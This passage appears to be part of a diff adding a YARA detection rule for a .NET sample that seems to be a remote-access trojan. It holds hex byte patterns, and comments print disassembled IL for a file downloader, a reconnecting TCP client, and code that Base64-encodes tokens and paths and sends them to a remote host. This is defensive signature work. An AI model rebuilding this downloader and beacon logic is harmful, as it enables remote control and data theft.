?? ?? ?? ?? 0D 09 08 8C ?? ?? ?? ?? 28 ?? ?? ?? ?? 13 ?? 28 ?? ?? ?? ?? 18 8D ?? ?? ?? ?? 13 ?? 11 ?? 16 1F ?? 9C 11 ?? 17 1F ?? 9C 11 ?? 6F ?? ?? ?? ?? 26 07 28 ?? ?? ?? ?? 1F ?? 8D ?? ?? ?? ?? 25 D0 ?? ?? ?? ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 11 ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 18 8D ?? ?? ?? ?? 13 ?? 11 ?? 16 1F ?? 9C 11 ?? 17 1F ?? 9C 11 ?? 6F ?? ?? ?? ?? 11 ?? 28 ?? ?? ?? ?? 13 ?? 28 ?? ?? ?? ?? 11 ?? 6F ?? ?? ?? ?? 13 ?? 28 ?? ?? ?? ?? 1F ?? 8D ?? ?? ?? ?? 25 D0 ?? ?? ?? ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ?? 28 ?? ?? ?? ?? 1F ?? 8D ?? ?? ?? ?? 25 D0 ?? ?? ?? ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ?? 16 6A 13 ?? 11 ?? 11 ?? 8E 69 6A 58 13 ?? 04 6F ?? ?? ?? ?? 13 ?? 2B ?? 12 ?? 28 ?? ?? ?? ?? 13 ?? 11 ?? 11 ?? 7B ?? ?? ?? ?? 28 ?? ?? ?? ?? 11 ?? 7B ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 13 ?? 28 ?? ?? ?? ?? 11 ?? 6F ?? ?? ?? ?? 13 ?? 11 ?? 18 6A 58 13 ?? 11 ?? 11 ?? 8E 69 6A 58 13 ?? 11 ?? 18 6A 58 13 ?? 11 ?? 11 ?? 8E 69 6A 58 13 ?? 12 ?? 28 ?? ?? ?? ?? 2D ?? DE ?? 12 ?? FE 16 ?? ?? ?? ?? 6F ?? ?? ?? ?? DC 05 6F ?? ?? ?? ?? 13 ?? 2B ?? 12 ?? 28 ?? ?? ?? ?? 13 ?? 11 ?? 11 ?? 7B ?? ?? ?? ?? 11 ?? 7B ?? ?? ?? ?? 28 ?? ?? ?? ?? 11 ?? 7B ?? ?? ?? ?? 28 ?? ?? ?? ?? 13 ?? 28 ?? ?? ?? ?? 11 ?? 6F ?? ?? ?? ?? 13 ?? 11 ?? 18 6A 58 13 ?? 11 ?? 11 ?? 8E 69 6A 58 13 ?? 11 ?? 7B ?? ?? ?? ?? 73 ?? ?? ?? ?? 13 ?? 11 ?? 11 ?? 6F ?? ?? ?? ?? 58 13 ?? 11 ?? 18 6A 58 13 ?? 11 ?? 11 ?? 8E 69 6A 58 13 ?? 12 ?? 28 ?? ?? ?? ?? 2D ?? DE ?? 12 ?? FE 16 ?? ?? ?? ?? 6F ?? ?? ?? ?? DC 11 ?? 18 6A 58 13 ?? 11 ?? 18 6A 58 13 ?? 07 11 ?? 6F ?? ?? ?? ?? 07 6F ?? ?? ?? ?? 13 ?? 11 ?? 11 ?? 16 11 ?? 8E 69 6F ?? ?? ?? ?? 04 6F ?? ?? ?? ?? 13 ?? 38 ?? ?? ?? ?? 12 ?? 28 ?? ?? ?? ?? 13 ?? 11 ?? 11 ?? 7B ?? ?? ?? ?? 28 ?? ?? ?? ?? 11 ?? 7B ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 13 ?? 28 ?? ?? ?? ?? 11 ?? 6F ?? ?? ?? ?? 13 ?? 11 ?? 18 8D ?? ?? ?? ?? 13 ?? 11 ?? 16 1F ?? 9C 11 ?? 17 1F ?? 9C 11 ?? 16 18 6F ?? ?? ?? ?? 11 ?? 11 ?? 16 11 ?? 8E 69 6F ?? ?? ?? ?? 11 ?? 18 8D ?? ?? ?? ?? 13 ?? 11 ?? 16 1F ?? 9C 11 ?? 17 1F ?? 9C 11 ?? 16 18 6F ?? ?? ?? ?? 11 ?? 11 ?? 16 11 ?? 8E 69 6F ?? ?? ?? ?? 12 ?? 28 ?? ?? ?? ?? 3A ?? ?? ?? ?? DE ?? 12 ?? FE 16 ?? ?? ?? ?? 6F ?? ?? ?? ?? DC 05 6F ?? ?? ?? ?? 13 ?? 38 ?? ?? ?? ?? 12 ?? 28 ?? ?? ?? ?? 13 ?? 11 ?? 11 ?? 7B ?? ?? ?? ?? 11 ?? 7B ?? ?? ?? ?? 28 ?? ?? ?? ?? 11 ?? 7B ?? ?? ?? ?? 28 ?? ?? ?? ?? 13 ?? 28 ?? ?? ?? ?? 11 ?? 6F ?? ?? ?? ?? 13 ?? 11 ?? 18 8D ?? ?? ?? ?? 13 ?? 11 ?? 16 1F ?? 9C 11 ?? 17 1F ?? 9C 11 ?? 16 18 6F ?? ?? ?? ?? 11 ?? 11 ?? 16 11 ?? 8E 69 6F ?? ?? ?? ?? 11 ?? 7B ?? ?? ?? ?? 19 17 73 ?? ?? ?? ?? 13 ?? 20 ?? ?? ?? ?? 8D ?? ?? ?? ?? 13 ?? 11 ?? 11 ?? 16 11 ?? 8E 69 6F ?? ?? ?? ?? 13 ?? 2B ?? 11 ?? 11 ?? 16 11 ?? 6F ?? ?? ?? ?? 11 ?? 11 ?? 16 11 ?? 8E 69 6F ?? ?? ?? ?? 13 ?? 11 ?? 16 30 ?? 11 ?? 6F ?? ?? ?? ?? 11 ?? 18 8D ?? ?? ?? ?? 13 ?? 11 ?? 16 1F ?? 9C 11 ?? 17 1F ?? 9C 11 ?? 16 18 6F ?? ?? ?? ?? 11 ?? 11 ?? 16 11 ?? 8E 69 6F ?? ?? ?? ?? 12 ?? 28 ?? ?? ?? ?? 3A ?? ?? ?? ?? DE ?? 12 ?? FE 16 ?? ?? ?? ?? 6F ?? ?? ?? ?? DC 11 ?? 18 8D ?? ?? ?? ?? 13 ?? 11 ?? 16 1F ?? 9C 11 ?? 17 1F ?? 9C 11 ?? 16 18 6F ?? ?? ?? ?? 11 ?? 18 8D ?? ?? ?? ?? 13 ?? 11 ?? 16 1F ?? 9C 11 ?? 17 1F ?? 9C 11 ?? 16 18 6F ?? ?? ?? ?? 11 ?? 6F ?? ?? ?? ?? 11 ?? 6F ?? ?? ?? ?? 07 6F ?? ?? ?? ?? 74 ?? ?? ?? ?? 13 ?? 11 ?? 6F ?? ?? ?? ?? 13 ?? 11 ?? 73 ?? ?? ?? ?? 13 ?? 11 ?? 6F ?? ?? ?? ?? 0A 11 ?? 6F ?? ?? ?? ?? 11 ?? 6F ?? ?? ?? ?? 11 ?? 6F ?? ?? ?? ?? DE ?? 13 ?? 11 ?? 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? DE ?? 26 DE ?? DE ?? 26 DE ?? 06 2A } + /* +function WebDL.WebDL::_down1 0x0600009b@1c444ebeba24dcba8628b7dfe5fec7c6 with 6 features: + - check if file exists + - create HTTP request + - manipulate console buffer + - receive HTTP response + - send HTTP request + - send data + 3144 72 01 00 00 70 ldstr "" + 3149 0a stloc.0 + 314A 02 ldarg.0 + 314B 04 ldarg.2 + 314C 28 99 00 00 06 call _getName + 3151 0b stloc.1 + 3152 07 ldloc.1 + 3153 72 01 00 00 70 ldstr "" + 3158 28 bd 00 00 0a call System.String::op_Equality + 315D 2c 08 brfalse.s 0x3167 + 315F 06 ldloc.0 + 3160 13 0a stloc.s local(0x000A) + 3162 dd c3 00 00 00 leave 0x322a + 3167 03 ldarg.1 + 3168 07 ldloc.1 + 3169 28 60 00 00 0a call System.IO.Path::Combine + 316E 0c stloc.2 + 316F 08 ldloc.2 + 3170 28 be 00 00 0a call System.Console::WriteLine + 3175 17 ldc.i4.1 + 3176 0d stloc.3 + 3177 2b 1c br.s 0x3195 + 3179 03 ldarg.1 + 317A 09 ldloc.3 + 317B 8c 32 00 00 01 box System.Int32 + 3180 72 13 02 00 70 ldstr "_" + 3185 07 ldloc.1 + 3186 28 28 00 00 0a call System.String::Concat + 318B 28 60 00 00 0a call System.IO.Path::Combine + 3190 0c stloc.2 + 3191 09 ldloc.3 + 3192 17 ldc.i4.1 + 3193 58 add + 3194 0d stloc.3 + 3195 08 ldloc.2 + 3196 28 bf 00 00 0a call System.IO.File::Exists + 319B 2d dc brtrue.s 0x3179 + 319D 08 ldloc.2 + 319E 28 c0 00 00 0a call System.IO.File::OpenWrite + 31A3 13 04 stloc.s local(0x0004) + 31A5 20 00 00 10 00 ldc.i4 0x100000 + 31AA 8d 3d 00 00 01 newarr System.Byte + 31AF 13 05 stloc.s local(0x0005) + 31B1 04 ldarg.2 + 31B2 28 97 00 00 0a call System.Net.WebRequest::Create + 31B7 75 58 00 00 01 isinst System.Net.HttpWebRequest + 31BC 13 06 stloc.s local(0x0006) + 31BE 11 06 ldloc.s local(0x0006) + 31C0 6f b3 00 00 0a callvirt System.Net.WebRequest::GetResponse + 31C5 75 67 00 00 01 isinst System.Net.HttpWebResponse + 31CA 13 07 stloc.s local(0x0007) + 31CC 11 07 ldloc.s local(0x0007) + 31CE 6f b4 00 00 0a callvirt System.Net.WebResponse::GetResponseStream + 31D3 13 08 stloc.s local(0x0008) + 31D5 11 08 ldloc.s local(0x0008) + 31D7 11 05 ldloc.s local(0x0005) + 31D9 16 ldc.i4.0 + 31DA 11 05 ldloc.s local(0x0005) + 31DC 8e ldlen + 31DD 69 conv.i4 + 31DE 6f 84 00 00 0a callvirt System.IO.Stream::Read + 31E3 13 09 stloc.s local(0x0009) + 31E5 2b 1c br.s 0x3203 + 31E7 11 04 ldloc.s local(0x0004) + 31E9 11 05 ldloc.s local(0x0005) + 31EB 16 ldc.i4.0 + 31EC 11 09 ldloc.s local(0x0009) + 31EE 6f 89 00 00 0a callvirt System.IO.Stream::Write + 31F3 11 08 ldloc.s local(0x0008) + 31F5 11 05 ldloc.s local(0x0005) + 31F7 16 ldc.i4.0 + 31F8 11 05 ldloc.s local(0x0005) + 31FA 8e ldlen + 31FB 69 conv.i4 + 31FC 6f 84 00 00 0a callvirt System.IO.Stream::Read + 3201 13 09 stloc.s local(0x0009) + 3203 11 09 ldloc.s local(0x0009) + 3205 16 ldc.i4.0 + 3206 30 df bgt.s 0x31e7 + 3208 11 08 ldloc.s local(0x0008) + 320A 6f b2 00 00 0a callvirt System.IO.Stream::Close + 320F 11 07 ldloc.s local(0x0007) + 3211 6f b8 00 00 0a callvirt System.Net.WebResponse::Close + 3216 11 04 ldloc.s local(0x0004) + 3218 6f b2 00 00 0a callvirt System.IO.Stream::Close + 321D 72 17 02 00 70 ldstr "OK" + 3222 0a stloc.0 + 3223 de 03 leave.s 0x3228 + 3225 26 pop + 3226 de 00 leave.s 0x3228 + 3228 06 ldloc.0 + 3229 2a ret + 322A 11 0a ldloc.s local(0x000A) + 322C 2a ret + */ + $c3 = { 72 ?? ?? ?? ?? 0A 02 04 28 ?? ?? ?? ?? 0B 07 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 2C ?? 06 13 ?? DD ?? ?? ?? ?? 03 07 28 ?? ?? ?? ?? 0C 08 28 ?? ?? ?? ?? 17 0D 2B ?? 03 09 8C ?? ?? ?? ?? 72 ?? ?? ?? ?? 07 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0C 09 17 58 0D 08 28 ?? ?? ?? ?? 2D ?? 08 28 ?? ?? ?? ?? 13 ?? 20 ?? ?? ?? ?? 8D ?? ?? ?? ?? 13 ?? 04 28 ?? ?? ?? ?? 75 ?? ?? ?? ?? 13 ?? 11 ?? 6F ?? ?? ?? ?? 75 ?? ?? ?? ?? 13 ?? 11 ?? 6F ?? ?? ?? ?? 13 ?? 11 ?? 11 ?? 16 11 ?? 8E 69 6F ?? ?? ?? ?? 13 ?? 2B ?? 11 ?? 11 ?? 16 11 ?? 6F ?? ?? ?? ?? 11 ?? 11 ?? 16 11 ?? 8E 69 6F ?? ?? ?? ?? 13 ?? 11 ?? 16 30 ?? 11 ?? 6F ?? ?? ?? ?? 11 ?? 6F ?? ?? ?? ?? 11 ?? 6F ?? ?? ?? ?? 72 ?? ?? ?? ?? 0A DE ?? 26 DE ?? 06 2A 11 ?? 2A } + /* +function Sockets.MySocket::<.ctor>b__0 0x0600008a@1c444ebeba24dcba8628b7dfe5fec7c6 with 1 features: + - act as TCP client + 2394 20 f4 01 00 00 ldc.i4 0x1f4 + 2399 28 6a 00 00 0a call System.Threading.Thread::Sleep + 239E 20 00 00 a0 00 ldc.i4 0xa00000 + 23A3 8d 3d 00 00 01 newarr System.Byte + 23A8 0a stloc.0 + 23A9 38 11 01 00 00 br 0x24bf + 23AE 02 ldarg.0 + 23AF 7b 8a 00 00 04 ldfld _tcpClient + 23B4 3a 9d 00 00 00 brtrue 0x2456 + 23B9 02 ldarg.0 + 23BA 73 7d 00 00 0a newobj System.Net.Sockets.TcpClient::.ctor + 23BF 7d 8a 00 00 04 stfld _tcpClient + 23C4 02 ldarg.0 + 23C5 7b 8a 00 00 04 ldfld _tcpClient + 23CA 20 00 00 a0 00 ldc.i4 0xa00000 + 23CF 6f 7e 00 00 0a callvirt System.Net.Sockets.TcpClient::set_SendBufferSize + 23D4 02 ldarg.0 + 23D5 7b 8a 00 00 04 ldfld _tcpClient + 23DA 20 00 00 a0 00 ldc.i4 0xa00000 + 23DF 6f 7f 00 00 0a callvirt System.Net.Sockets.TcpClient::set_ReceiveBufferSize + 23E4 02 ldarg.0 + 23E5 7b 8a 00 00 04 ldfld _tcpClient + 23EA 02 ldarg.0 + 23EB 7b 8e 00 00 04 ldfld __host + 23F0 02 ldarg.0 + 23F1 7b 8f 00 00 04 ldfld __port + 23F6 6f 80 00 00 0a callvirt System.Net.Sockets.TcpClient::Connect + 23FB 02 ldarg.0 + 23FC 02 ldarg.0 + 23FD 7b 8a 00 00 04 ldfld _tcpClient + 2402 6f 81 00 00 0a callvirt System.Net.Sockets.TcpClient::GetStream + 2407 7d 8b 00 00 04 stfld _networkStream + 240C 02 ldarg.0 + 240D 17 ldc.i4.1 + 240E 7d 89 00 00 04 stfld isConnected + 2413 02 ldarg.0 + 2414 7b 90 00 00 04 ldfld onConnected + 2419 2c 11 brfalse.s 0x242c + 241B 02 ldarg.0 + 241C 7b 90 00 00 04 ldfld onConnected + 2421 02 ldarg.0 + 2422 7b 89 00 00 04 ldfld isConnected + 2427 6f 82 00 00 0a callvirt Invoke + 242C de 28 leave.s 0x2456 + 242E 26 pop + 242F 02 ldarg.0 + 2430 16 ldc.i4.0 + 2431 7d 89 00 00 04 stfld isConnected + 2436 02 ldarg.0 + 2437 14 ldnull + 2438 7d 8a 00 00 04 stfld _tcpClient + 243D 02 ldarg.0 + 243E 14 ldnull + 243F 7d 8b 00 00 04 stfld _networkStream + 2444 28 83 00 00 0a call System.GC::Collect + 2449 02 ldarg.0 + 244A 7b 88 00 00 04 ldfld reConnectionDelay + 244F 28 6a 00 00 0a call System.Threading.Thread::Sleep + 2454 de 00 leave.s 0x2456 + 2456 02 ldarg.0 + 2457 7b 8b 00 00 04 ldfld _networkStream + 245C 2c 37 brfalse.s 0x2495 + 245E 02 ldarg.0 + 245F 7b 8b 00 00 04 ldfld _networkStream + 2464 06 ldloc.0 + 2465 16 ldc.i4.0 + 2466 06 ldloc.0 + 2467 8e ldlen + 2468 69 conv.i4 + 2469 6f 84 00 00 0a callvirt System.IO.Stream::Read + 246E 0b stloc.1 + 246F 28 29 00 00 0a call System.Text.Encoding::get_UTF8 + 2474 06 ldloc.0 + 2475 16 ldc.i4.0 + 2476 07 ldloc.1 + 2477 6f 85 00 00 0a callvirt System.Text.Encoding::GetString + 247C 0c stloc.2 + 247D 07 ldloc.1 + 247E 16 ldc.i4.0 + 247F 31 14 ble.s 0x2495 + 2481 02 ldarg.0 + 2482 7b 91 00 00 04 ldfld onData + 2487 2c 0c brfalse.s 0x2495 + 2489 02 ldarg.0 + 248A 7b 91 00 00 04 ldfld onData + 248F 08 ldloc.2 + 2490 6f 6c 00 00 0a callvirt Invoke + 2495 de 21 leave.s 0x24b8 + 2497 26 pop + 2498 02 ldarg.0 + 2499 14 ldnull + 249A 7d 8a 00 00 04 stfld _tcpClient + 249F 02 ldarg.0 + 24A0 14 ldnull + 24A1 7d 8b 00 00 04 stfld _networkStream + 24A6 28 83 00 00 0a call System.GC::Collect + 24AB 02 ldarg.0 + 24AC 7b 88 00 00 04 ldfld reConnectionDelay + 24B1 28 6a 00 00 0a call System.Threading.Thread::Sleep + 24B6 de 00 leave.s 0x24b8 + 24B8 1f 0a ldc.i4.s 0xa + 24BA 28 6a 00 00 0a call System.Threading.Thread::Sleep + 24BF 02 ldarg.0 + 24C0 7b 8d 00 00 04 ldfld _isRunning + 24C5 3a e4 fe ff ff brtrue 0x23ae + 24CA 2a ret + */ + $c4 = { 20 ?? ?? ?? ?? 28 ?? ?? ?? ?? 20 ?? ?? ?? ?? 8D ?? ?? ?? ?? 0A 38 ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 3A ?? ?? ?? ?? 02 73 ?? ?? ?? ?? 7D ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 20 ?? ?? ?? ?? 6F ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 20 ?? ?? ?? ?? 6F ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 6F ?? ?? ?? ?? 02 02 7B ?? ?? ?? ?? 6F ?? ?? ?? ?? 7D ?? ?? ?? ?? 02 17 7D ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 2C ?? 02 7B ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 6F ?? ?? ?? ?? DE ?? 26 02 16 7D ?? ?? ?? ?? 02 14 7D ?? ?? ?? ?? 02 14 7D ?? ?? ?? ?? 28 ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 28 ?? ?? ?? ?? DE ?? 02 7B ?? ?? ?? ?? 2C ?? 02 7B ?? ?? ?? ?? 06 16 06 8E 69 6F ?? ?? ?? ?? 0B 28 ?? ?? ?? ?? 06 16 07 6F ?? ?? ?? ?? 0C 07 16 31 ?? 02 7B ?? ?? ?? ?? 2C ?? 02 7B ?? ?? ?? ?? 08 6F ?? ?? ?? ?? DE ?? 26 02 14 7D ?? ?? ?? ?? 02 14 7D ?? ?? ?? ?? 28 ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 28 ?? ?? ?? ?? DE ?? 1F ?? 28 ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 3A ?? ?? ?? ?? 2A } + /* +function Reqss.Reqss::b__1 0x06000023@1c444ebeba24dcba8628b7dfe5fec7c6 with 1 features: + - decode data using Base64 in .NET + 07FA 02 ldarg.0 + 07FB 28 29 00 00 0a call System.Text.Encoding::get_UTF8 + 0800 02 ldarg.0 + 0801 7b 9d 00 00 04 ldfld _text1 + 0806 28 47 00 00 0a call System.Convert::FromBase64String + 080B 6f 48 00 00 0a callvirt System.Text.Encoding::GetString + 0810 7d 9d 00 00 04 stfld _text1 + 0815 2a ret + */ + $c5 = { 02 28 ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 7D ?? ?? ?? ?? 2A } + /* +function test_A1.Form1::b__14 0x0600001b@1c444ebeba24dcba8628b7dfe5fec7c6 with 1 features: + - encode data using Base64 + 04D8 02 ldarg.0 + 04D9 7b 23 00 00 04 ldfld mySocket + 04DE 17 ldc.i4.1 + 04DF 8c 32 00 00 01 box System.Int32 + 04E4 72 23 00 00 70 ldstr "|" + 04E9 28 29 00 00 0a call System.Text.Encoding::get_UTF8 + 04EE 7e 22 00 00 04 ldsfld _TOKEN_ + 04F3 72 23 00 00 70 ldstr "|" + 04F8 16 ldc.i4.0 + 04F9 8c 32 00 00 01 box System.Int32 + 04FE 28 28 00 00 0a call System.String::Concat + 0503 6f 2a 00 00 0a callvirt System.Text.Encoding::GetBytes + 0508 28 2b 00 00 0a call System.Convert::ToBase64String + 050D 28 28 00 00 0a call System.String::Concat + 0512 6f 88 00 00 06 callvirt Send + 0517 26 pop + 0518 2a ret + */ + $c6 = { 02 7B ?? ?? ?? ?? 17 8C ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 7E ?? ?? ?? ?? 72 ?? ?? ?? ?? 16 8C ?? ?? ?? ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 26 2A } + /* +function Reqss.Reqss::b__6 0x06000028@1c444ebeba24dcba8628b7dfe5fec7c6 with 1 features: + - encode data using Base64 + 0884 02 ldarg.0 + 0885 1c ldc.i4.6 + 0886 8d 01 00 00 01 newarr System.Object + 088B 0a stloc.0 + 088C 06 ldloc.0 + 088D 16 ldc.i4.0 + 088E 20 a0 86 01 00 ldc.i4 0x186a0 + 0893 8c 32 00 00 01 box System.Int32 + 0898 a2 stelem.ref + 0899 06 ldloc.0 + 089A 17 ldc.i4.1 + 089B 72 23 00 00 70 ldstr "|" + 08A0 a2 stelem.ref + 08A1 06 ldloc.0 + 08A2 18 ldc.i4.2 + 08A3 02 ldarg.0 + 08A4 7b 98 00 00 04 ldfld _adm_token + 08A9 a2 stelem.ref + 08AA 06 ldloc.0 + 08AB 19 ldc.i4.3 + 08AC 72 23 00 00 70 ldstr "|" + 08B1 a2 stelem.ref + 08B2 06 ldloc.0 + 08B3 1a ldc.i4.4 + 08B4 28 29 00 00 0a call System.Text.Encoding::get_UTF8 + 08B9 02 ldarg.0 + 08BA 7b 9e 00 00 04 ldfld _temp_dir1 + 08BF 6f 2a 00 00 0a callvirt System.Text.Encoding::GetBytes + 08C4 28 2b 00 00 0a call System.Convert::ToBase64String + 08C9 a2 stelem.ref + 08CA 06 ldloc.0 + 08CB 1b ldc.i4.5 + 08CC 72 23 00 00 70 ldstr "|" + 08D1 a2 stelem.ref + 08D2 06 ldloc.0 + 08D3 28 49 00 00 0a call System.String::Concat + 08D8 7d 97 00 00 04 stfld _socket_res + 08DD 2a ret + */ + $c7 = { 02 1C 8D ?? ?? ?? ?? 0A 06 16 20 ?? ?? ?? ?? 8C ?? ?? ?? ?? A2 06 17 72 ?? ?? ?? ?? A2 06 18 02 7B ?? ?? ?? ?? A2 06 19 72 ?? ?? ?? ?? A2 06 1A 28 ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? A2 06 1B 72 ?? ?? ?? ?? A2 06 28 ?? ?? ?? ?? 7D ?? ?? ?? ?? 2A } + /* +function Reqss.Reqss::b__a 0x0600002c@1c444ebeba24dcba8628b7dfe5fec7c6 with 1 features: + - encode data using Base64 + 09B4 02 ldarg.0 + 09B5 25 dup + 09B6 7b 97 00 00 04 ldfld _socket_res + 09BB 28 29 00 00 0a call System.Text.Encoding::get_UTF8 + 09C0 02 ldarg.0 + 09C1 7b a1 00 00 04 ldfld _res2 + 09C6 6f 2a 00 00 0a callvirt System.Text.Encoding::GetBytes + 09CB 28 2b 00 00 0a call System.Convert::ToBase64String + 09D0 28 50 00 00 0a call System.String::Concat + 09D5 7d 97 00 00 04 stfld _socket_res + 09DA 2a ret + */ + $c8 = { 02 25 7B ?? ?? ?? ?? 28 ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 7D ?? ?? ?? ?? 2A } + /* +function <>c__DisplayClassa1::b__33 0x060000a0@1c444ebeba24dcba8628b7dfe5fec7c6 with 1 features: + - encode data using Base64 + 0F20 1b ldc.i4.5 + 0F21 8d 01 00 00 01 newarr System.Object + 0F26 0b stloc.1 + 0F27 07 ldloc.1 + 0F28 16 ldc.i4.0 + 0F29 20 50 34 03 00 ldc.i4 0x33450 + 0F2E 8c 32 00 00 01 box System.Int32 + 0F33 a2 stelem.ref + 0F34 07 ldloc.1 + 0F35 17 ldc.i4.1 + 0F36 72 23 00 00 70 ldstr "|" + 0F3B a2 stelem.ref + 0F3C 07 ldloc.1 + 0F3D 18 ldc.i4.2 + 0F3E 7e 28 00 00 04 ldsfld _1_shll_ + 0F43 7b 87 00 00 04 ldfld _adm_token + 0F48 a2 stelem.ref + 0F49 07 ldloc.1 + 0F4A 19 ldc.i4.3 + 0F4B 72 23 00 00 70 ldstr "|" + 0F50 a2 stelem.ref + 0F51 07 ldloc.1 + 0F52 1a ldc.i4.4 + 0F53 28 29 00 00 0a call System.Text.Encoding::get_UTF8 + 0F58 03 ldarg.1 + 0F59 6f 2a 00 00 0a callvirt System.Text.Encoding::GetBytes + 0F5E 28 2b 00 00 0a call System.Convert::ToBase64String + 0F63 a2 stelem.ref + 0F64 07 ldloc.1 + 0F65 28 49 00 00 0a call System.String::Concat + 0F6A 0a stloc.0 + 0F6B 06 ldloc.0 + 0F6C 72 01 00 00 70 ldstr "" + 0F71 28 2c 00 00 0a call System.String::op_Inequality + 0F76 2c 0d brfalse.s 0xf85 + 0F78 02 ldarg.0 + 0F79 7b b0 00 00 04 ldfld mySocket + 0F7E 06 ldloc.0 + 0F7F 6f 88 00 00 06 callvirt Send + 0F84 26 pop + 0F85 2a ret + */ + $c9 = { 1B 8D ?? ?? ?? ?? 0B 07 16 20 ?? ?? ?? ?? 8C ?? ?? ?? ?? A2 07 17 72 ?? ?? ?? ?? A2 07 18 7E ?? ?? ?? ?? 7B ?? ?? ?? ?? A2 07 19 72 ?? ?? ?? ?? A2 07 1A 28 ?? ?? ?? ?? 03 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? A2 07 28 ?? ?? ?? ?? 0A 06 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 2C ?? 02 7B ?? ?? ?? ?? 06 6F ?? ?? ?? ?? 26 2A } + /* +function Funcss.Funcs::CreateMD5 0x0600001d@1c444ebeba24dcba8628b7dfe5fec7c6 with 1 features: + - hash data with MD5 + 071C 28 3a 00 00 0a call System.Security.Cryptography.MD5::Create + 0721 0a stloc.0 + 0722 28 3b 00 00 0a call System.Text.Encoding::get_ASCII + 0727 02 ldarg.0 + 0728 6f 2a 00 00 0a callvirt System.Text.Encoding::GetBytes + 072D 0b stloc.1 + 072E 06 ldloc.0 + 072F 07 ldloc.1 + 0730 6f 3c 00 00 0a callvirt System.Security.Cryptography.HashAlgorithm::ComputeHash + 0735 0c stloc.2 + 0736 73 3d 00 00 0a newobj System.Text.StringBuilder::.ctor + 073B 0d stloc.3 + 073C 16 ldc.i4.0 + 073D 13 04 stloc.s local(0x0004) + 073F 2b 1f br.s 0x760 + 0741 09 ldloc.3 + 0742 08 ldloc.2 + 0743 11 04 ldloc.s local(0x0004) + 0745 8f 3d 00 00 01 ldelema System.Byte + 074A 72 33 00 00 70 ldstr "x2" + 074F 28 3e 00 00 0a call System.Byte::ToString + 0754 6f 3f 00 00 0a callvirt System.Text.StringBuilder::Append + 0759 26 pop + 075A 11 04 ldloc.s local(0x0004) + 075C 17 ldc.i4.1 + 075D 58 add + 075E 13 04 stloc.s local(0x0004) + 0760 11 04 ldloc.s local(0x0004) + 0762 08 ldloc.2 + 0763 8e ldlen + 0764 69 conv.i4 + 0765 32 da blt.s 0x741 + 0767 09 ldloc.3 + 0768 6f 40 00 00 0a callvirt System.Object::ToString + 076D 13 05 stloc.s local(0x0005) + 076F de 0a leave.s 0x77b + 0771 06 ldloc.0 + 0772 2c 06 brfalse.s 0x77a + 0774 06 ldloc.0 + 0775 6f 2f 00 00 0a callvirt System.IDisposable::Dispose + 077A dc endfinally + 077B 11 05 ldloc.s local(0x0005) + 077D 2a ret + */ + $c10 = { 28 ?? ?? ?? ?? 0A 28 ?? ?? ?? ?? 02 6F ?? ?? ?? ?? 0B 06 07 6F ?? ?? ?? ?? 0C 73 ?? ?? ?? ?? 0D 16 13 ?? 2B ?? 09 08 11 ?? 8F ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 26 11 ?? 17 58 13 ?? 11 ?? 08 8E 69 32 ?? 09 6F ?? ?? ?? ?? 13 ?? DE ?? 06 2C ?? 06 6F ?? ?? ?? ?? DC 11 ?? 2A } + /* +function Reqss.Reqss::b__49 0x06000069@1c444ebeba24dcba8628b7dfe5fec7c6 with 1 features: + - get common file path + 12C3 02 ldarg.0 + 12C4 1f 1a ldc.i4.s 0x1a + 12C6 28 5f 00 00 0a call System.Environment::GetFolderPath + 12CB 7d 9e 00 00 04 stfld _temp_dir1 + 12D0 2a ret + */ + $c11 = { 02 1F ?? 28 ?? ?? ?? ?? 7D ?? ?? ?? ?? 2A } + /* +function Reqss.Reqss::b__18 0x0600003a@1c444ebeba24dcba8628b7dfe5fec7c6 with 1 features: + - create directory + 0BC4 02 ldarg.0 + 0BC5 7b 9e 00 00 04 ldfld _temp_dir1 + 0BCA 28 54 00 00 0a call System.IO.Directory::CreateDirectory + 0BCF 26 pop + 0BD0 de 03 leave.s 0xbd5 + 0BD2 26 pop + 0BD3 de 00 leave.s 0xbd5 + 0BD5 2a ret + */ + $c12 = { 02 7B ?? ?? ?? ?? 28 ?? ?? ?? ?? 26 DE ?? 26 DE ?? 2A } + /* +function Reqss.Reqss::b__4b 0x0600006b@1c444ebeba24dcba8628b7dfe5fec7c6 with 2 features: + - check if directory exists + - create directory + 12EA 02 ldarg.0 + 12EB 7b 9e 00 00 04 ldfld _temp_dir1 + 12F0 28 61 00 00 0a call System.IO.Directory::Exists + 12F5 2d 0c brtrue.s 0x1303 + 12F7 02 ldarg.0 + 12F8 7b 9e 00 00 04 ldfld _temp_dir1 + 12FD 28 54 00 00 0a call System.IO.Directory::CreateDirectory + 1302 26 pop + 1303 2a ret + */ + $c13 = { 02 7B ?? ?? ?? ?? 28 